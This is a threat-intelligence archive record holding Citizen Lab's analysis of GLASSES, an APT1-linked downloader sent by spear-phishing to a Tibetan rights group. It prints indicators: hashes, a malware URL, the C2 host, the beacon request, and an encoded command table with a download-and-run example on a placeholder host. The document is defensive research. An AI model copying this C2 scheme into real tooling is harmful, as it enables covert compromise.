{ "id": "5586881a-14c9-477f-8512-298ebbed0182", "created_at": "2026-04-06T00:20:09.820306Z", "updated_at": "2026-04-10T03:38:09.984515Z", "deleted_at": null, "sha1_hash": "02c97fa0e3b6e1f0d17db437c123c5363ff98d18", "title": "APT1's GLASSES - Watching a Human Rights Organization - The Citizen Lab", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 506061, "plain_text": "APT1's GLASSES - Watching a Human Rights Organization - The\r\nCitizen Lab\r\nArchived: 2026-04-05 12:53:11 UTC\r\nKey Findings\r\nMalware (“GLASSES”) sent in 2010 is a simple downloader that is closely related to the GOGGLES\r\nmalware described by Mandiant in their APT1 report.\r\nGLASSES was sent in a highly targeted email to a Tibetan human rights organization, demonstrating that\r\nAPT1 is involved in more than just industrial and corporate espionage, with attacks against civil society\r\nactors documented as early as almost three years ago.\r\nThe methods and infrastructure of this attack are consistent with those described in Mandiant’s APT1\r\nreport, e.g., spear phishing against an English-speaking target, having an infrastructure of compromised\r\nmachines for malware distribution and C2 operation.\r\nThe GLASSES sample analyzed shares a large percentage of code and an operational C2 server with a\r\nGOGGLES sample, indicating that they are from the same source.\r\nThe GOGGLES sample we discovered that communicates to the shared C2 server is not exactly the same\r\nas described in the Mandiant report, indicating that GLASSES may be a variant of GOGGLES, and that the\r\nsoftware has been used while under active development.\r\nOverview\r\nOn February 19, 2013, Mandiant released a report titled “APT1: Exposing One of China’s Cyber Espionage\r\nUnits.” [Offsite-PDF] The report describes the activities of one cyber espionage group, APT1 (referred to as\r\n“Comment Crew” or “Byzantine Candor” in other reports), that has targeted a large number of organizations in a\r\nwide range of industries, stealing terabytes of data. Mandiant traced APT1 operations to China and makes the case\r\nthat the group may in fact be the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s\r\n3rd Department, also known as Unit 61398.\r\nIn early 2011, Citizen Lab was forwarded a malicious email containing a link to a malware sample for analysis, as\r\npart of our ongoing study of targeted cyber threats against human rights organizations. This email, sent almost a\r\nyear earlier to the head of an organization focused on Tibetan rights and issues, contains malware that is very\r\nsimilar to one program described in Appendix C (“The Malware Arsenal”) of Mandiant’s report, which they\r\nnamed “GOGGLES.” (We have previously reported on other targeted attacks against Tibetan organizations, such\r\nas the recent PlugX RAT and the LURK variant of Gh0st RAT.)\r\nThe malicious program analyzed at Citizen Lab shares both a large percentage of code and the same command and\r\ncontrol (C2) infrastructure as the program described in the APT1 report. We are calling this program GLASSES\r\nbecause it is related to GOGGLES and uses a compromised eyeglasses storefront website as its C2 server.\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 1 of 11\n\nGLASSES is particularly interesting because it demonstrates that APT1 is not limited to attacks against industrial\r\nand commercial organizations, but also targets civil society organizations. It is unlikely that our study’s participant\r\nis the only civil society target of APT1 malware, although no attacks against civil society organizations have been\r\ndocumented in the Mandiant report. Both Mandiant and Shadowserver have included a Tibetan-themed domain in\r\ndomain lists, supporting the idea that other organizations are targeted, but have not included any information on\r\nthe details of Tibetan-related APT1 operations. A Bloomberg article mentions that the nonprofit organization\r\nInternational Republican Institute was compromised by the same group in June 2011, but no technical details of\r\nthe attack were released.\r\nCivil society organizations such as the study participant that received this email are frequently and persistently\r\nattacked just the same as corporate and government targets. However, reporting on such attacks by security\r\nvendors is less common: these vendors generally lack visibility into civil society, as civil society organizations\r\noften do not have the resources to buy their security products or services. This may be the reason for the lack of\r\nreference to civil society targets in Mandiant’s APT1 report, as it is likely that Mandiant has better visibility into\r\ncorporate and government targets through their client base.\r\nTargeted Email and Infection\r\nOn March 17, 2011, we were forwarded an email sent on April 28, 2010 from a Yahoo! webmail address to\r\nsomeone at one of our participating organizations. The email is written in English, and references the recipient’s\r\norganization by name.\r\nSome details of the email immediately flag it as suspicious: the name in the email address is “Nate Herman” (see\r\nFigure 2 below for full header details and other information) although the email is signed “Martin Lee.” The\r\nforwarded email included full headers, so we were able to obtain more information about its origin (Yahoo!\r\nincludes the sender’s source IP in the headers when an email is sent over the webmail interface). In this case, the\r\noriginating IP is 69.95.255.26, which is registered to One Communications, Inc. / EarthLink Business, and is very\r\nsimilar to IPs used in a similar attack — demonstrating that this attack is not isolated, and the IPs are likely being\r\nreused for other malware campaigns.\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 2 of 11\n\nThis email contains a link to a ZIP file located at hxxp://tcw.homier.com/attchments/details.zip (MD5:\r\n6fb3ecc3db624a4912ddbd2d565c4995). The homier.com domain belongs to Homier Distributing Company, Inc.\r\nand appears to have been compromised. A search for this subdomain can find other instances of malware hosted\r\nthere, such as that detailed in ThreatExpert’s report on 87e840054d37f83c5077e685d45c0abb indicating a file in\r\n/images/update.bin, and another malicious program getting the file /attachments/SalaryAdjustment.zip.\r\nThe details.zip file contains a single executable file, Save my Tibetan wife – for [targeted organization’s\r\nname].exe (MD5: 356fc183b7e73a74383fdb1e74f84709) which pretends to be a folder by using the same icon as\r\na folder:\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 3 of 11\n\nWhen the executable is run, it deletes itself, then creates and opens a folder of the same name with a PDF\r\ndocument (filename: details.pdf, MD5: a3cd8f45eef80eacb6bf3d2415139efa) in it. From the user’s perspective,\r\nthis is almost indistinguishable from opening an actual folder:\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 4 of 11\n\nThe PDF is not malicious, but it is damaged: the header and EOF markers have been deleted, and there is no xref\r\ntable. As a result, Adobe Reader and other PDF viewing programs are unable to open it.\r\nThe content of the PDF implies that it was repurposed from a job posting regarding a position relating to public\r\nhealth in association with USAID in Nepal. Objects that are not displayed have information about what appears to\r\nbe a real job posting, and the author metadata seems to be from a real person at the organization. Because the\r\ncontent is not directly related to the subject matter of the email, it suggests that it is not meant to be opened and\r\nmay have been reused from a previous attack against a different organization.\r\nMeanwhile, the original program drops an executable named spkptdhv.exe (MD5:\r\n80a45ce5d3cc416fffdafa101bdf002c) in %temp%, and adds itself to the registry in order to restart on reboot.\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 5 of 11\n\nMalware – “GLASSES”\r\nThe dropped executable connects to a website and downloads a single HTML page. The site appears to be part of\r\na legitimate website for an eyeglasses company, suggesting that it has been compromised. We contacted the\r\nhosting provider of the compromised site in March 2011, but never received any response.\r\nThe HTTP request includes a marker in the User-Agent string, indicating that it is was sent by this malware:\r\nGET /ewpindex.htm HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; Clj26Dbj.XYZ)\r\nHost: ewplus.com\r\nCache-Control: no-cache\r\nThe marker string has two parts, separated by a period. The first part (“Clj26Dbj”) is an encoded version of the\r\ncomputer’s name, presumably for tracking which machines at an organization are infected. The second part\r\n(changed to “XYZ” here) appears to be a campaign code, as the original is the standard abbreviation for the\r\norganization to which it was sent.\r\nThe marker may be in the User-Agent string so that it shows up in the access log on the web server, indicating that\r\nthe attacker has access to these logs and may monitor them for signs of infection. As the User-Agent string shows\r\nup in web access logs, it would be simple for an attacker to monitor for compromised computers connecting to the\r\nC2 server this way.\r\nThe command from the compromised web page (ewpindex.htm) looks like this:\r\nThe accessed page contains an anchor with an encoded command in it. The malware looks for the string in the\r\nanchor tag with the target NewRef, and then decodes it to a command. The link itself is empty, so that there is\r\nnothing to click on and it is invisible on the page. Another page on the same site, aboutus.htm, contains a different\r\ncommand although the URL is not apparently used by this binary.\r\nThe commands found on the website are:\r\nPage Encoded Decoded\r\newpindex.htm KVHc6Gcj s:120\r\naboutus.htm KVHe6ibj s:30\r\ntable 1\r\nLooking through the malware code, it is evident that this is a simple downloader with only two commands. The\r\ncommands are:\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 6 of 11\n\nCommand\r\nCharacter\r\nCommand Description Example\r\ns Sleep\r\nSleep for specified number\r\nof minutes\r\ns:120\r\nr\r\nDownload\r\nand Run\r\nDownload and run\r\nexecutable binary at\r\nspecified location on the\r\nweb\r\nr:http://www.foo.com/bar.exe\r\ntable 2\r\nThe C2 server is still live, but it has the same sleep command as it did when we reported the compromise to the\r\nhosting provider approximately two years ago. It is unknown whether this means the attackers have lost control\r\nover the compromised server, or whether it is still live — for example, it may require manual intervention to\r\nchange the page to a download command, and this may only happen when logs of an infected computer appear\r\nagain. The attackers may choose only to provide a malicious second stage program for GLASSES to download\r\nand execute when they have verified the target, or may only keep the download link live for a very short amount\r\nof time to discourage its discovery and analysis. At no point in our investigation of this malware did the command\r\nstring change from this sleep command.\r\nComparison to GOGGLES, an APT1 Attack\r\nIn “Appendix C: The Malware Arsenal” of the Mandiant APT1 report, the authors describe and give names to 49\r\ndifferent malicious programs. One of these is called “GOGGLES” — a simple downloader that is controlled via\r\nencoded markers in files accessed over HTTP.\r\nThe C2 communication method, commands, and particularly the data encoding method in GOGGLES are very\r\nsimilar to the sample we analyzed. The connection was initially noticed due to a shared string used in decoding\r\nmethods, and the presence of the same two commands for each program. Follow-up code analysis confirmed that\r\nthese programs share much of the same code, and use the same C2 server. It is very likely that GOGGLES is a\r\nlater version of GLASSES.\r\nDecoding Algorithm\r\nIn GLASSES, the URL for the webpage and the campaign code are not found in plain text inside of the binary.\r\nThe program keeps the information stored in an encoded format that is not immediately recognizable. However,\r\nthe decoding function uses a very recognizable string, “thequickbrownfxjmpsvalzydg,” which is how we were\r\nable to quickly identify this malware as being possibly related to APT1:\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 7 of 11\n\nThis decoding method is mentioned in the Mandiant report multiple times, used by the GOGGLES malware as\r\nwell as three other malicious programs (SWORD, NEWSREELS, and LONGRUN).\r\nSharing C2 Domain with GOGGLES\r\nWhen we first analyzed the sample in March 2011, we searched a private malware database for related network\r\ntraffic and found the following results:\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 8 of 11\n\nAt the time, the significance of the file 4poval.jpg was not immediately clear. Upon casual inspection, it seems to\r\nbe an image that is related to the website content:\r\nThe Mandiant report describes GOGGLES sending an initial HTTP GET request for a JPEG image file with an\r\nembedded control command. The command offset is stored six bytes before the end of the file, and the command\r\nhas a magic value (an arbitrary string of bytes) to indicate that it is actually a GOGGLES command file, and not\r\njust image data:\r\nChecking the 4poval.jpg file (still available on the website as of February 2013) shows that the GOGGLES\r\ncommand data is present.\r\nSix bytes from the end of the file is the four byte offset 00 00 09 68. The bytes ff 02 b7 bc at offset 0x968 are the\r\nmagic value described in the Mandiant report (in reverse order due to byte ordering), confirming that this is a\r\nGOGGLES control file.\r\nSince the two malware programs use the same domain for command and control and share much of the same code,\r\nit is very likely that these programs are used by the same group. The GOGGLES code is more sophisticated than\r\nthe GLASSES code: in addition to a more effective method of hiding the command data, it also has more\r\ncountermeasures to protect against reverse engineering and hide itself on the infected system. For this reason, it is\r\nvery likely that GOGGLES is a later version of GLASSES.\r\nAnalysis of GOGGLES Sample\r\nA search using the VirusTotal Malware Intelligence service for the MD5 of the sample found in our network\r\ntraffic database found a copy of the GOGGLES program that downloads the command image from this C2 server.\r\nComparing this GOGGLES binary 64c47ead2e95e4033f0f1f1fedaf15cf (which uses the above image file to\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 9 of 11\n\nreceive commands) to the behavior described in the Mandiant report does not result in a 100% behavior match.\r\nThe User-Agent string does not exactly match the one described in the report, but uses one similar to the\r\nGLASSES sample. After the normal user-agent information, there are two strings, which likely correspond to the\r\nencoded computer name (“Alj26Bbj”) and campaign code (“RUCK”).\r\nThe User-Agent string that is different than that described in the Mandiant report shows that the behavior of\r\nGOGGLES was changing while in use, strengthening the idea that GLASSES may be an earlier development of\r\nthe same malware family.\r\nConclusions and Recommendations\r\nThe description of GOGGLES in the Mandiant report and its attribution to APT1 has given us enough information\r\nto attribute a similar attack to them as well. This attack, which we are calling GLASSES, took place in April 2010\r\nand was targeted against a Tibetan human rights organization. This demonstrates that APT1 is interested not only\r\nin industrial and commercial targets, but civil society organizations as well.\r\nThe sample of GLASSES we were sent has many technical similarities to Mandiant’s description of GOGGLES,\r\nincluding specific strings used for encoding and decoding. While this suggests that the two programs are related,\r\nthere are other possible explanations for this connection, such as an attack found in the wild and repurposed by a\r\nnew group. By searching for related network traffic, however, we were able to discover a file on the GLASSES\r\nserver which contains GOGGLES control information — a clear indication that the malware is being operated by\r\nthe same group.\r\nUsing VirusTotal’s Malware Intelligence service, we were able to find a copy of the specific GOGGLES binary\r\nusing the same C2 server. Analysis of this GOGGLES sample revealed behavior that was similar but not exactly\r\nthe same as the behavior described in the Mandiant report. The difference in behavior between the GOGGLES\r\nversions suggests that the malware was under active development during the time period of the attacks. Because\r\nGLASSES is a simpler version of GOGGLES with the same commands but fewer countermeasures against\r\nreverse engineering and analysis, it is likely that GLASSES is an earlier version of GOGGLES.\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 10 of 11\n\nThe vector for the GLASSES attack we observed was consistent with the modus operandi for APT1 described by\r\nthe Mandiant report: a targeted email sent to an English-speaking target, using a set of compromised computers as\r\njumping points. This type of threat is very dangerous to civil society organizations as well as industrial and\r\ncommercial targets.\r\nAs with other targeted email attacks, organizations can protect themselves against this kind of attack by treating\r\nemail with caution, especially email with attachments or links. A more detailed set of recommendations for\r\ndefending against email and other threats can be found at Citizen Lab’s page on Recommendations for Defending\r\nAgainst Targeted Cyber Threats.\r\nSource: https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nhttps://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/" ], "report_names": [ "apt1s-glasses-watching-a-human-rights-organization" ], "threat_actors": [ { "id": "dabb6779-f72e-40ca-90b7-1810ef08654d", "created_at": "2022-10-25T15:50:23.463113Z", "updated_at": "2026-04-10T02:00:05.369301Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "APT1", "Comment Crew", "Comment Group", "Comment Panda" ], "source_name": "MITRE:APT1", "tools": [ "Seasalt", "ipconfig", "Cachedump", "PsExec", "GLOOXMAIL", "Lslsass", "PoisonIvy", "WEBC2", "Mimikatz", "gsecdump", "Pass-The-Hash Toolkit", "Tasklist", "xCmd", "pwdump" ], "source_id": "MITRE", "reports": null }, { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "dcba8e2b-93e0-4d6e-a15f-5c44faebc3b1", "created_at": "2022-10-25T16:07:23.816991Z", "updated_at": "2026-04-10T02:00:04.758143Z", "deleted_at": null, "main_name": "Lurk", "aliases": [], "source_name": "ETDA:Lurk", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434809, "ts_updated_at": 1775792289, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.pdf", "text": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.txt", "img": "https://archive.orkl.eu/02c97fa0e3b6e1f0d17db437c123c5363ff98d18.jpg" } }